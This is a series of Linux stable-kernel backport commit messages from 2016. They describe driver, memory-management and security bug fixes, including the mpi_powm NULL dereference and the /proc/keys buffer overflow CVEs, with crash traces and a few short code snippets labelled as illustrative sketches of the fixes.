VDD1, VDD2, and VIO output programmed voltage level can go higher than
expected or crash, when coming out of PFM to PWM mode or using DVFS.
Description:
When DCDC CLK SYNC bits are 11/01:
* VIO 3-MHz oscillator is the source clock of the digital core and input
clock of VDD1 and VDD2
* Turn-on of VDD1 and VDD2 HSD PFET is synchronized or at a constant
phase shift
* Current pulled though VCC1+VCC2 is Iload(VDD1) + Iload(VDD2)
* The 3 HSD PFET will be turned-on at the same time, causing the highest
possible switching noise on the application. This noise level depends
on the layout, the VBAT level, and the load current. The noise level
increases with improper layout.
When DCDC CLK SYNC bits are 00:
* VIO 3-MHz oscillator is the source clock of digital core
* VDD1 and VDD2 are running on their own 3-MHz oscillator
* Current pulled though VCC1+VCC2 average of Iload(VDD1) + Iload(VDD2)
* The switching noise of the 3 SMPS will be randomly spread over time,
causing lower overall switching noise.
Workaround:
Set DCDCCTRL_REG[1:0]= 00.
Signed-off-by: Jan Remmet <j.remmet@phytec.de>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Peter Ujfalusi [Tue, 23 Aug 2016 07:27:19 +0000 (10:27 +0300)]
ASoC: omap-mcpdm: Fix irq resource handling
commit
a8719670687c46ed2e904c0d05fa4cd7e4950cd1 upstream.
Fixes:
ddd17531ad908 ("ASoC: omap-mcpdm: Clean up with devm_* function")
A managed irq request will not do any good at ASoC probe level, as it is
not going to free up the irq when the driver is unbound from the sound
card.
Signed-off-by: Peter Ujfalusi <peter.ujfalusi@ti.com>
Reported-by: Russell King <linux@armlinux.org.uk>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Dan Carpenter [Thu, 4 Aug 2016 05:26:56 +0000 (08:26 +0300)]
mfd: 88pm80x: Double shifting bug in suspend/resume
commit
9a6dc644512fd083400a96ac4a035ac154fe6b8d upstream.
set_bit() and clear_bit() take the bit number so this code is really
doing "1 << (1 << irq)" which is a double shift bug. It's done
consistently so it won't cause a problem unless "irq" is more than 4.
Fixes:
70c6cce04066 ('mfd: Support 88pm80x in 80x driver')
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Lee Jones <lee.jones@linaro.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
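The double shift in miniature (variable names are illustrative, not the driver's):
unsigned long wu_flag = 0;
int irq = 2;

/* buggy: set_bit() takes a bit number, so this really sets bit (1 << irq) */
set_bit(1 << irq, &wu_flag);

/* fixed: pass the bit number itself */
set_bit(irq, &wu_flag);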
Andrey Ryabinin [Thu, 24 Nov 2016 13:23:10 +0000 (13:23 +0000)]
mpi: Fix NULL ptr dereference in mpi_powm() [ver #3]
commit
f5527fffff3f002b0a6b376163613b82f69de073 upstream.
This fixes CVE-2016-8650.
If mpi_powm() is given a zero exponent, it wants to immediately return
either 1 or 0, depending on the modulus. However, if the result was
initialised with zero limb space, no limb space is allocated and a
NULL-pointer exception ensues.
Fix this by allocating a minimal amount of limb space for the result in
the 0-exponent case when the result is 1, and by not touching the limb
space when the result is 0.
This affects the use of RSA keys and X.509 certificates that carry them.
BUG: unable to handle kernel NULL pointer dereference at (null)
IP: [<
ffffffff8138ce5d>] mpi_powm+0x32/0x7e6
PGD 0
Oops: 0002 [#1] SMP
Modules linked in:
CPU: 3 PID: 3014 Comm: keyctl Not tainted 4.9.0-rc6-fscache+ #278
Hardware name: ASUS All Series/H97-PLUS, BIOS 2306 10/09/2014
task:
ffff8804011944c0 task.stack:
ffff880401294000
RIP: 0010:[<
ffffffff8138ce5d>] [<
ffffffff8138ce5d>] mpi_powm+0x32/0x7e6
RSP: 0018:
ffff880401297ad8 EFLAGS:
00010212
RAX:
0000000000000000 RBX:
ffff88040868bec0 RCX:
ffff88040868bba0
RDX:
ffff88040868b260 RSI:
ffff88040868bec0 RDI:
ffff88040868bee0
RBP:
ffff880401297ba8 R08:
0000000000000000 R09:
0000000000000000
R10:
0000000000000047 R11:
ffffffff8183b210 R12:
0000000000000000
R13:
ffff8804087c7600 R14:
000000000000001f R15:
ffff880401297c50
FS:
00007f7a7918c700(0000) GS:
ffff88041fb80000(0000) knlGS:
0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0:
0000000080050033
CR2:
0000000000000000 CR3:
0000000401250000 CR4:
00000000001406e0
Stack:
ffff88040868bec0 0000000000000020 ffff880401297b00 ffffffff81376cd4
0000000000000100 ffff880401297b10 ffffffff81376d12 ffff880401297b30
ffffffff81376f37 0000000000000100 0000000000000000 ffff880401297ba8
Call Trace:
[<
ffffffff81376cd4>] ? __sg_page_iter_next+0x43/0x66
[<
ffffffff81376d12>] ? sg_miter_get_next_page+0x1b/0x5d
[<
ffffffff81376f37>] ? sg_miter_next+0x17/0xbd
[<
ffffffff8138ba3a>] ? mpi_read_raw_from_sgl+0xf2/0x146
[<
ffffffff8132a95c>] rsa_verify+0x9d/0xee
[<
ffffffff8132acca>] ? pkcs1pad_sg_set_buf+0x2e/0xbb
[<
ffffffff8132af40>] pkcs1pad_verify+0xc0/0xe1
[<
ffffffff8133cb5e>] public_key_verify_signature+0x1b0/0x228
[<
ffffffff8133d974>] x509_check_for_self_signed+0xa1/0xc4
[<
ffffffff8133cdde>] x509_cert_parse+0x167/0x1a1
[<
ffffffff8133d609>] x509_key_preparse+0x21/0x1a1
[<
ffffffff8133c3d7>] asymmetric_key_preparse+0x34/0x61
[<
ffffffff812fc9f3>] key_create_or_update+0x145/0x399
[<
ffffffff812fe227>] SyS_add_key+0x154/0x19e
[<
ffffffff81001c2b>] do_syscall_64+0x80/0x191
[<
ffffffff816825e4>] entry_SYSCALL64_slow_path+0x25/0x25
Code: 56 41 55 41 54 53 48 81 ec a8 00 00 00 44 8b 71 04 8b 42 04 4c 8b 67 18 45 85 f6 89 45 80 0f 84 b4 06 00 00 85 c0 75 2f 41 ff ce <49> c7 04 24 01 00 00 00 b0 01 75 0b 48 8b 41 18 48 83 38 01 0f
RIP [<
ffffffff8138ce5d>] mpi_powm+0x32/0x7e6
RSP <
ffff880401297ad8>
CR2:
0000000000000000
---[ end trace
d82015255d4a5d8d ]---
Basically, this is a backport of a libgcrypt patch:
http://git.gnupg.org/cgi-bin/gitweb.cgi?p=libgcrypt.git;a=patch;h=
6e1adb05d290aeeb1c230c763970695f4a538526
Fixes:
cdec9cb5167a ("crypto: GnuPG based MPI lib - source files (part 1)")
Signed-off-by: Andrey Ryabinin <aryabinin@virtuozzo.com>
Signed-off-by: David Howells <dhowells@redhat.com>
cc: Dmitry Kasatkin <dmitry.kasatkin@gmail.com>
cc: linux-ima-devel@lists.sourceforge.net
Signed-off-by: James Morris <james.l.morris@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
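A sketch of the guard described above, assuming an mpi_resize()-style helper; the real patch may structure the early return differently:
if (!esize) {
	/* exponent is 0: result is 1, unless the modulus is 1 (then it is 0) */
	res->nlimbs = (msize == 1 && mod->d[0] == 1) ? 0 : 1;
	if (res->nlimbs) {
		if (mpi_resize(res, 1) < 0)	/* make sure one limb exists */
			goto enomem;
		res->d[0] = 1;
	}
	res->sign = 0;
	goto leave;
}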
Michael Walle [Tue, 19 Jul 2016 14:43:26 +0000 (16:43 +0200)]
hwmon: (adt7411) set bit 3 in CFG1 register
commit
b53893aae441a034bf4dbbad42fe218561d7d81f upstream.
According to the datasheet you should only write 1 to this bit. If it is
not set, at least AIN3 will return bad values on newer silicon revisions.
Fixes:
d84ca5b345c2 ("hwmon: Add driver for ADT7411 voltage and temperature sensor")
Signed-off-by: Michael Walle <michael@walle.cc>
Signed-off-by: Guenter Roeck <linux@roeck-us.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Sergei Miroshnichenko [Wed, 7 Sep 2016 13:51:12 +0000 (16:51 +0300)]
can: dev: fix deadlock reported after bus-off
commit
9abefcb1aaa58b9d5aa40a8bb12c87d02415e4c8 upstream.
A timer was used to restart after the bus-off state, leading to a
relatively large can_restart() executed in an interrupt context,
which in turn sets up pinctrl. When this happens during system boot,
there is a high probability of grabbing the pinctrl_list_mutex,
which is already locked by the probe() of another device, making the
kernel suspect a deadlock condition [1].
To resolve this issue, the restart_timer is replaced by a delayed
work.
[1] https://github.com/victronenergy/venus/issues/24
Signed-off-by: Sergei Miroshnichenko <sergeimir@emcraft.com>
Signed-off-by: Marc Kleine-Budde <mkl@pengutronix.de>
Signed-off-by: Willy Tarreau <w@1wt.eu>
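A minimal sketch of the timer-to-delayed-work conversion (field and helper names are assumptions):
/* setup, e.g. when the device is opened */
INIT_DELAYED_WORK(&priv->restart_work, can_restart_work);

/* on bus-off, instead of arming restart_timer: */
schedule_delayed_work(&priv->restart_work,
		      msecs_to_jiffies(priv->restart_ms));

/* can_restart_work() then calls can_restart() in process context,
 * where sleeping on pinctrl mutexes is safe
 */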
zhong jiang [Wed, 28 Sep 2016 22:22:30 +0000 (15:22 -0700)]
mm,ksm: fix endless looping in allocating memory when ksm enable
commit
5b398e416e880159fe55eefd93c6588fa072cd66 upstream.
I hit the following hung task when running an OOM LTP test case with a
4.1 kernel.
Call trace:
[<
ffffffc000086a88>] __switch_to+0x74/0x8c
[<
ffffffc000a1bae0>] __schedule+0x23c/0x7bc
[<
ffffffc000a1c09c>] schedule+0x3c/0x94
[<
ffffffc000a1eb84>] rwsem_down_write_failed+0x214/0x350
[<
ffffffc000a1e32c>] down_write+0x64/0x80
[<
ffffffc00021f794>] __ksm_exit+0x90/0x19c
[<
ffffffc0000be650>] mmput+0x118/0x11c
[<
ffffffc0000c3ec4>] do_exit+0x2dc/0xa74
[<
ffffffc0000c46f8>] do_group_exit+0x4c/0xe4
[<
ffffffc0000d0f34>] get_signal+0x444/0x5e0
[<
ffffffc000089fcc>] do_signal+0x1d8/0x450
[<
ffffffc00008a35c>] do_notify_resume+0x70/0x78
The oom victim cannot terminate because it needs to take mmap_sem for
write while the lock is held by ksmd for read which loops in the page
allocator
ksm_do_scan
scan_get_next_rmap_item
down_read
get_next_rmap_item
alloc_rmap_item #ksmd will loop permanently.
There is no way forward because the oom victim cannot release any memory
in a 4.1-based kernel. Since 4.6 we have the oom reaper which would solve
this problem because it would release the memory asynchronously.
Nevertheless we can relax alloc_rmap_item requirements and use
__GFP_NORETRY because the allocation failure is acceptable as ksm_do_scan
would just retry later after the lock got dropped.
Such a patch would also be easy to backport to older stable kernels which
do not have oom_reaper.
While we are at it, add __GFP_NOWARN so the admin doesn't have to be alarmed
by the allocation failure.
Link: http://lkml.kernel.org/r/1474165570-44398-1-git-send-email-zhongjiang@huawei.com
Signed-off-by: zhong jiang <zhongjiang@huawei.com>
Suggested-by: Hugh Dickins <hughd@google.com>
Suggested-by: Michal Hocko <mhocko@suse.cz>
Acked-by: Michal Hocko <mhocko@suse.com>
Acked-by: Hugh Dickins <hughd@google.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
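Roughly what the relaxed allocation looks like (a sketch under the flags named above, not necessarily the exact hunk):
static inline struct rmap_item *alloc_rmap_item(void)
{
	struct rmap_item *rmap_item;

	/* may fail now; ksm_do_scan() simply retries on a later pass */
	rmap_item = kmem_cache_zalloc(rmap_item_cache,
				      GFP_KERNEL | __GFP_NORETRY | __GFP_NOWARN);
	if (rmap_item)
		ksm_rmap_items++;
	return rmap_item;
}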
Mike Snitzer [Thu, 25 Aug 2016 01:12:58 +0000 (21:12 -0400)]
dm flakey: fix reads to be issued if drop_writes configured
commit
299f6230bc6d0ccd5f95bb0fb865d80a9c7d5ccc upstream.
v4.8-rc3 commit
99f3c90d0d ("dm flakey: error READ bios during the
down_interval") overlooked the 'drop_writes' feature, which is meant to
allow reads to be issued rather than errored, during the down_interval.
Fixes:
99f3c90d0d ("dm flakey: error READ bios during the down_interval")
Reported-by: Qu Wenruo <quwenruo@cn.fujitsu.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Chris Metcalf [Wed, 16 Nov 2016 16:18:05 +0000 (11:18 -0500)]
tile: avoid using clocksource_cyc2ns with absolute cycle count
commit
e658a6f14d7c0243205f035979d0ecf6c12a036f upstream.
For large values of "mult" and long uptimes, the intermediate
result of "cycles * mult" can overflow 64 bits. For example,
the tile platform calls clocksource_cyc2ns with a 1.2 GHz clock;
we have mult = 853, and after 208.5 days, we overflow 64 bits.
Since clocksource_cyc2ns() is intended to be used for relative
cycle counts, not absolute cycle counts, performance is more
important than accepting a wider range of cycle values. So,
just use mult_frac() directly in tile's sched_clock().
Commit
4cecf6d401a0 ("sched, x86: Avoid unnecessary overflow
in sched_clock") by Salman Qazi results in essentially the same
generated code for x86 as this change does for tile. In fact,
a follow-on change by Salman introduced mult_frac() and switched
to using it, so the C code was largely identical at that point too.
Peter Zijlstra then added mul_u64_u32_shr() and switched x86
to use it. This is, in principle, better; by optimizing the
64x64->64 multiplies to be 32x32->64 multiplies we can potentially
save some time. However, the compiler pipelines the 64x64->64
multiplies pretty well, and the conditional branch in the generic
mul_u64_u32_shr() causes some bubbles in execution, with the
result that it's pretty much a wash. If tilegx provided its own
implementation of mul_u64_u32_shr() without the conditional branch,
we could potentially save 3 cycles, but that seems like small gain
for a fair amount of additional build scaffolding; no other platform
currently provides a mul_u64_u32_shr() override, and tile doesn't
currently have an <asm/div64.h> header to put the override in.
Additionally, gcc currently has an optimization bug that prevents
it from recognizing the opportunity to use a 32x32->64 multiply,
and so the result would be no better than the existing mult_frac()
until such time as the compiler is fixed.
For now, just using mult_frac() seems like the right answer.
Signed-off-by: Chris Metcalf <cmetcalf@mellanox.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
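A sketch of the resulting sched_clock(), assuming the usual mult/shift pair; the identifier names are illustrative:
unsigned long long sched_clock(void)
{
	/* mult_frac() splits the multiply so "cycles * mult" never needs a
	 * 128-bit intermediate, unlike the clocksource_cyc2ns() helper
	 */
	return mult_frac(get_cycles(),
			 sched_clock_mult, 1ULL << SCHED_CLOCK_SHIFT);
}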
Myron Stowe [Tue, 3 Feb 2015 23:01:24 +0000 (16:01 -0700)]
PCI: Handle read-only BARs on AMD CS553x devices
commit
06cf35f903aa6da0cc8d9f81e9bcd1f7e1b534bb upstream.
Some AMD CS553x devices have read-only BARs because of a firmware or
hardware defect. There's a workaround in quirk_cs5536_vsa(), but it no
longer works after
36e8164882ca ("PCI: Restore detection of read-only
BARs"). Prior to
36e8164882ca, we filled in res->start; afterwards we
leave it zeroed out. The quirk only updated the size, so the driver tried
to use a region starting at zero, which didn't work.
Expand quirk_cs5536_vsa() to read the base addresses from the BARs and
hard-code the sizes.
On Nix's system BAR 2's read-only value is 0x6200. Prior to
36e8164882ca,
we interpret that as a 512-byte BAR based on the lowest-order bit set. Per
datasheet sec 5.6.1, that BAR (MFGPT) requires only 64 bytes; use that to
avoid clearing any address bits if a platform uses only 64-byte alignment.
[js] pcibios_bus_to_resource takes pdev, not bus in 3.12
[bhelgaas: changelog, reduce BAR 2 size to 64]
Fixes:
36e8164882ca ("PCI: Restore detection of read-only BARs")
Link: https://bugzilla.kernel.org/show_bug.cgi?id=85991#c4
Link: http://support.amd.com/TechDocs/31506_cs5535_databook.pdf
Link: http://support.amd.com/TechDocs/33238G_cs5536_db.pdf
Reported-and-tested-by: Nix <nix@esperi.org.uk>
Signed-off-by: Myron Stowe <myron.stowe@redhat.com>
Signed-off-by: Bjorn Helgaas <bhelgaas@google.com>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Punit Agrawal [Tue, 18 Oct 2016 16:07:19 +0000 (17:07 +0100)]
ACPI / APEI: Fix incorrect return value of ghes_proc()
commit
806487a8fc8f385af75ed261e9ab658fc845e633 upstream.
Although ghes_proc() tests for errors while reading the error status,
it always returns success (0). Fix this by propagating the return
value.
Fixes:
d334a49113a4a33 (ACPI, APEI, Generic Hardware Error Source memory error support)
Signed-off-by: Punit Agrawal <punit.agrawal@arm.com>
Tested-by: Tyler Baicar <tbaicar@codeaurora.org>
Reviewed-by: Borislav Petkov <bp@suse.de>
[ rjw: Subject ]
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
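The shape of the fix, sketched with the APEI helper names but a simplified body:
static int ghes_proc(struct ghes *ghes)
{
	int rc;

	rc = ghes_read_estatus(ghes, 0);
	if (rc)
		goto out;
	ghes_do_proc(ghes, ghes->estatus);
out:
	ghes_clear_estatus(ghes);
	return rc;		/* previously: return 0; */
}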
Alexander Usyskin [Mon, 31 Oct 2016 17:02:39 +0000 (19:02 +0200)]
mei: bus: fix received data size check in NFC fixup
commit
582ab27a063a506ccb55fc48afcc325342a2deba upstream.
The NFC version reply size is checked against only the header size, not
against the full message size. That may potentially lead to uninitialized
memory access in the version data.
That leads to warnings when version data is accessed:
drivers/misc/mei/bus-fixup.c: warning: '*((void *)&ver+11)' may be used uninitialized in this function [-Wuninitialized]: => 212:2
Reported in
Build regressions/improvements in v4.9-rc3
https://lkml.org/lkml/2016/10/30/57
[js] the check is in 3.12 only once
Fixes:
59fcd7c63abf (mei: nfc: Initial nfc implementation)
Signed-off-by: Alexander Usyskin <alexander.usyskin@intel.com>
Signed-off-by: Tomas Winkler <tomas.winkler@intel.com>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Arnd Bergmann [Mon, 24 Oct 2016 15:22:01 +0000 (17:22 +0200)]
staging: iio: ad5933: avoid uninitialized variable in error case
commit
34eee70a7b82b09dbda4cb453e0e21d460dae226 upstream.
The ad5933_i2c_read function returns an error code to indicate
whether it could read data or not. However ad5933_work() ignores
this return code and just accesses the data unconditionally,
which gets detected by gcc as a possible bug:
drivers/staging/iio/impedance-analyzer/ad5933.c: In function 'ad5933_work':
drivers/staging/iio/impedance-analyzer/ad5933.c:649:16: warning: 'status' may be used uninitialized in this function [-Wmaybe-uninitialized]
This adds minimal error handling so we only evaluate the
data if it was correctly read.
Link: https://patchwork.kernel.org/patch/8110281/
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Acked-by: Lars-Peter Clausen <lars@metafoo.de>
Signed-off-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Long Li [Wed, 5 Oct 2016 23:57:46 +0000 (16:57 -0700)]
hv: do not lose pending heartbeat vmbus packets
commit
407a3aee6ee2d2cb46d9ba3fc380bc29f35d020c upstream.
The host keeps sending heartbeat packets independent of the
guest responding to them. Even though we respond to the heartbeat messages at
interrupt level, we can have situations where there may be multiple heartbeat
messages pending that have not been responded to. For instance this occurs when the
VM is paused and the host continues to send the heartbeat messages.
Address this issue by draining and responding to all
the heartbeat messages that may be pending.
Signed-off-by: Long Li <longli@microsoft.com>
Signed-off-by: K. Y. Srinivasan <kys@microsoft.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
David Howells [Wed, 26 Oct 2016 14:01:54 +0000 (15:01 +0100)]
KEYS: Fix short sprintf buffer in /proc/keys show function
commit
03dab869b7b239c4e013ec82aea22e181e441cfc upstream.
This fixes CVE-2016-7042.
Fix a short sprintf buffer in proc_keys_show(). If the gcc stack protector
is turned on, this can cause a panic due to stack corruption.
The problem is that xbuf[] is not big enough to hold a 64-bit timeout
rendered as weeks:
(gdb) p 0xffffffffffffffffULL/(60*60*24*7)
$2 =
30500568904943
That's 14 chars plus NUL, not 11 chars plus NUL.
Expand the buffer to 16 chars.
I think the unpatched code apparently works if the stack-protector is not
enabled because on a 32-bit machine the buffer won't be overflowed and on a
64-bit machine there's a 64-bit aligned pointer at one side and an int that
isn't checked again on the other side.
The panic incurred looks something like:
Kernel panic - not syncing: stack-protector: Kernel stack is corrupted in:
ffffffff81352ebe
CPU: 0 PID: 1692 Comm: reproducer Not tainted 4.7.2-201.fc24.x86_64 #1
Hardware name: Red Hat KVM, BIOS 0.5.1 01/01/2011
0000000000000086 00000000fbbd2679 ffff8800a044bc00 ffffffff813d941f
ffffffff81a28d58 ffff8800a044bc98 ffff8800a044bc88 ffffffff811b2cb6
ffff880000000010 ffff8800a044bc98 ffff8800a044bc30 00000000fbbd2679
Call Trace:
[<
ffffffff813d941f>] dump_stack+0x63/0x84
[<
ffffffff811b2cb6>] panic+0xde/0x22a
[<
ffffffff81352ebe>] ? proc_keys_show+0x3ce/0x3d0
[<
ffffffff8109f7f9>] __stack_chk_fail+0x19/0x30
[<
ffffffff81352ebe>] proc_keys_show+0x3ce/0x3d0
[<
ffffffff81350410>] ? key_validate+0x50/0x50
[<
ffffffff8134db30>] ? key_default_cmp+0x20/0x20
[<
ffffffff8126b31c>] seq_read+0x2cc/0x390
[<
ffffffff812b6b12>] proc_reg_read+0x42/0x70
[<
ffffffff81244fc7>] __vfs_read+0x37/0x150
[<
ffffffff81357020>] ? security_file_permission+0xa0/0xc0
[<
ffffffff81246156>] vfs_read+0x96/0x130
[<
ffffffff81247635>] SyS_read+0x55/0xc0
[<
ffffffff817eb872>] entry_SYSCALL_64_fastpath+0x1a/0xa4
Reported-by: Ondrej Kozina <okozina@redhat.com>
Signed-off-by: David Howells <dhowells@redhat.com>
Tested-by: Ondrej Kozina <okozina@redhat.com>
Signed-off-by: James Morris <james.l.morris@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Jan Viktorin [Tue, 17 May 2016 09:22:17 +0000 (11:22 +0200)]
uio: fix dmem_region_start computation
commit
4d31a2588ae37a5d0f61f4d956454e9504846aeb upstream.
The variable i contains a total number of resources (including
IORESOURCE_IRQ). However, we want the dmem_region_start to point
after the last resource of type IORESOURCE_MEM. The original behaviour
leads (very likely) to skipping several UIO mapping regions and makes
them useless. Fix this by computing dmem_region_start from the uiomem
which points to the last used UIO mapping.
Fixes:
0a0c3b5a24bd ("Add new uio device for dynamic memory allocation")
Signed-off-by: Jan Viktorin <viktorin@rehivetech.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Liu Gang [Fri, 21 Oct 2016 07:31:28 +0000 (15:31 +0800)]
gpio: mpc8xxx: Correct irq handler function
commit
d71cf15b865bdd45925f7b094d169aaabd705145 upstream.
From the beginning of gpio-mpc8xxx.c, "handle_level_irq" has
been used to handle GPIO interrupts in the PowerPC/Layerscape
platforms. But actually, almost all PowerPC/Layerscape platforms
assert an interrupt request upon either a high-to-low change or
any change on the state of the signal.
So the "handle_level_irq" is not reasonable for PowerPC/Layerscape
GPIO interrupt, it should be "handle_edge_irq". Otherwise the system
may lose some interrupts from the PIN's state changes.
Signed-off-by: Liu Gang <Gang.Liu@nxp.com>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Mauro Carvalho Chehab [Sun, 4 Sep 2016 13:06:39 +0000 (10:06 -0300)]
cx231xx: fix GPIOs for Pixelview SBTVD hybrid
commit
24b923f073ac37eb744f56a2c7f77107b8219ab2 upstream.
This device uses GPIO 28 to switch between analog and
digital modes: in digital mode, it should be set to 1.
The code that sets it in analog mode is OK, but it misses
the logic that sets it in digital mode.
Signed-off-by: Mauro Carvalho Chehab <mchehab@s-opensource.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Mauro Carvalho Chehab [Sun, 4 Sep 2016 12:56:33 +0000 (09:56 -0300)]
cx231xx: don't return error on success
commit
1871d718a9db649b70f0929d2778dc01bc49b286 upstream.
The cx231xx_set_agc_analog_digital_mux_select() callers
expect it to return 0 or an error. Returning a positive value
makes the first attempt to switch between analog/digital fail.
Signed-off-by: Mauro Carvalho Chehab <mchehab@s-opensource.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Mauro Carvalho Chehab [Sun, 4 Sep 2016 13:43:53 +0000 (10:43 -0300)]
mb86a20s: fix demod settings
commit
505a0ea706fc1db4381baa6c6bd2e596e730a55e upstream.
With the current settings, only one channel locks properly.
That's likely because, when this driver was written, Brazil
was still using experimental transmissions.
Change it to reproduce the settings used by the newer drivers.
That makes it lock on other channels.
Tested with both PixelView SBTVD Hybrid (cx231xx-based) and
C3Tech Digital Duo HDTV/SDTV (em28xx-based) devices.
Signed-off-by: Mauro Carvalho Chehab <mchehab@s-opensource.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Mauro Carvalho Chehab [Sun, 4 Sep 2016 13:16:18 +0000 (10:16 -0300)]
mb86a20s: fix the locking logic
commit
dafb65fb98d85d8e78405e82c83e81975e5d5480 upstream.
On this frontend, it takes a while to start outputting normal
TS data. That only happens on state S9. On S8, the TS output
is enabled, but it is not reliable enough.
However, the zigzag loop is too fast to let it sync.
As, on practical tests, the zigzag software loop doesn't
seem to be helping, but just slowing down the tuning, let's
switch to the hardware algorithm, as the tuners used on such
devices are capable of working with frequency drifts without
any help from software.
Signed-off-by: Mauro Carvalho Chehab <mchehab@s-opensource.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Andrew Bresticker [Mon, 15 Feb 2016 08:19:49 +0000 (09:19 +0100)]
pstore/ram: Use memcpy_fromio() to save old buffer
commit
d771fdf94180de2bd811ac90cba75f0f346abf8d upstream.
The ramoops buffer may be mapped as either I/O memory or uncached
memory. On ARM64, this results in a device-type (strongly-ordered)
mapping. Since unaligned accesses to device-type memory will
generate an alignment fault (regardless of whether or not strict
alignment checking is enabled), it is not safe to use memcpy().
memcpy_fromio() is guaranteed to only use aligned accesses, so use
that instead.
Signed-off-by: Andrew Bresticker <abrestic@chromium.org>
Signed-off-by: Enric Balletbo Serra <enric.balletbo@collabora.com>
Reviewed-by: Puneet Kumar <puneetster@chromium.org>
Signed-off-by: Kees Cook <keescook@chromium.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Furquan Shaikh [Mon, 15 Feb 2016 08:19:48 +0000 (09:19 +0100)]
pstore/ram: Use memcpy_toio instead of memcpy
commit
7e75678d23167c2527e655658a8ef36a36c8b4d9 upstream.
persistent_ram_update uses vmap / iomap based on whether the buffer is in
memory region or reserved region. However, both map it as non-cacheable
memory. For armv8 specifically, non-cacheable mapping requests use a
memory type that has to be accessed aligned to the request size. memcpy()
doesn't guarantee that.
Signed-off-by: Furquan Shaikh <furquan@google.com>
Signed-off-by: Enric Balletbo Serra <enric.balletbo@collabora.com>
Reviewed-by: Aaron Durbin <adurbin@chromium.org>
Reviewed-by: Olof Johansson <olofj@chromium.org>
Tested-by: Furquan Shaikh <furquan@chromium.org>
Signed-off-by: Kees Cook <keescook@chromium.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Sebastian Andrzej Siewior [Thu, 8 Sep 2016 11:48:06 +0000 (13:48 +0200)]
pstore/core: drop cmpxchg based updates
commit
d5a9bf0b38d2ac85c9a693c7fb851f74fd2a2494 upstream.
I have here an FPGA behind PCIe which exports SRAM which I use for
pstore. Now it seems that the FPGA no longer supports cmpxchg based
updates and writes back 0xff…ff and returns the same. This leads to a
crash during a crash, rendering pstore useless.
Since I doubt that there is much benefit from using cmpxchg() here, I am
dropping this atomic access and use the spinlock based version.
Cc: Anton Vorontsov <anton@enomsg.org>
Cc: Colin Cross <ccross@android.com>
Cc: Kees Cook <keescook@chromium.org>
Cc: Tony Luck <tony.luck@intel.com>
Cc: Rabin Vincent <rabinv@axis.com>
Tested-by: Rabin Vincent <rabinv@axis.com>
Signed-off-by: Sebastian Andrzej Siewior <bigeasy@linutronix.de>
Reviewed-by: Guenter Roeck <linux@roeck-us.net>
[kees: remove "_locked" suffix since it's the only option now]
Signed-off-by: Kees Cook <keescook@chromium.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Daniel Glöckner [Tue, 30 Aug 2016 12:17:30 +0000 (14:17 +0200)]
mmc: block: don't use CMD23 with very old MMC cards
commit
0ed50abb2d8fc81570b53af25621dad560cd49b3 upstream.
CMD23 aka SET_BLOCK_COUNT was introduced with MMC v3.1.
Older versions of the specification allowed multi-block
transfers to be terminated only with CMD12.
The patch fixes the following problem:
mmc0: new MMC card at address 0001
mmcblk0: mmc0:0001 SDMB-16 15.3 MiB
mmcblk0: timed out sending SET_BLOCK_COUNT command, card status 0x400900
...
blk_update_request: I/O error, dev mmcblk0, sector 0
Buffer I/O error on dev mmcblk0, logical block 0, async page read
mmcblk0: unable to read partition table
Signed-off-by: Daniel Glöckner <dg@emlix.com>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Fabio Estevam [Sat, 5 Nov 2016 19:45:07 +0000 (17:45 -0200)]
mmc: mxs: Initialize the spinlock prior to using it
commit
f91346e8b5f46aaf12f1df26e87140584ffd1b3f upstream.
An interrupt may occur right after devm_request_irq() is called and
prior to the spinlock initialization, leading to a kernel oops,
as the interrupt handler uses the spinlock.
In order to prevent this problem, move the spinlock initialization
prior to requesting the interrupts.
Fixes:
e4243f13d10e (mmc: mxs-mmc: add mmc host driver for i.MX23/28)
Signed-off-by: Fabio Estevam <fabio.estevam@nxp.com>
Reviewed-by: Marek Vasut <marex@denx.de>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Johan Hovold [Tue, 1 Nov 2016 10:49:56 +0000 (11:49 +0100)]
PM / sleep: fix device reference leak in test_suspend
commit
ceb75787bc75d0a7b88519ab8a68067ac690f55a upstream.
Make sure to drop the reference taken by class_find_device() after
opening the RTC device.
Fixes:
77437fd4e61f (pm: boot time suspend selftest)
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
